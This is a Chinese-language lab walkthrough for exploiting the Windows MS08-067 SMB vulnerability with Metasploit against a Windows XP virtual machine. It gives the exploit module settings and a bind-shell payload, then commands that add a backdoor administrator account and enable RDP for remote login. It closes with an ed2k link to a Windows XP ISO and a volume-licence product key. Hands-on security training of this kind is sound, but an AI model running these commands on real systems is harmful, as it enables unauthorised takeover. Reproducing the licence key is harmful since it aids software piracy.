MS08-067利用
MS08-067利用
一、概述
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。
用到的端口:445、3389
二、实验环境(虚拟机搭建)
目标:windows xp professional sp3 英文版(中文版测试不成功)
攻击:Kali Linux
三、攻击过程
1.获取靶机和Kali Linux的IP地址
Windows:DOS窗口输入命令
ipconfig /all
Kali Linux:终端输入命令
ifconfig
并且能相互ping
2.调用Kali Linux中msfconsole工具的ms08-067漏洞攻击模块
以下所有操作都是在Kali Linux的终端中完成
启动msfconsole工具
msfconsole
输入
search ms08-067
(查找漏洞攻击模块)
输入
use exploit/windows/smb/ms08_067_netapi
(使用该模块)
3.配置options
set LHOST 172.16.165.137
set RHOST 172.16.165.135
set RPORT 445
show payloads
set payload generic/shell_bind_tcp
show options
4.实施攻击
exploit
此时可以直接远程使用DOS命令对Windows进行操作
5.对Windwos进行远程连接
net user admin pass /add && net localgroup administrators admin /add
(在Windows上创建一个名称为admin密码为pass的用户,并提升为管理员权限)
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
(开启windows远程登录端口)或直接用msf自带模块开启rdp
netstat -an
(检查3389端口是否开启)
重新打开一个终端
rdesktop 172.16.165.135
进行远程登录
输入创建的用户名admin和密码pass回车 弹出提示框 点击OK 稍等就会成功远程登录
漏洞利用成功
四、用到的资源
Windows XP SP3 英文版下载地址:
ed2k://|file|en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso|617754624|7d1e7466df638674202dd8e7451c0b39|h=5JYEVQUSWB7WMCVM7JWGPNOIZFNTQXJY|
序列码:DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ
评论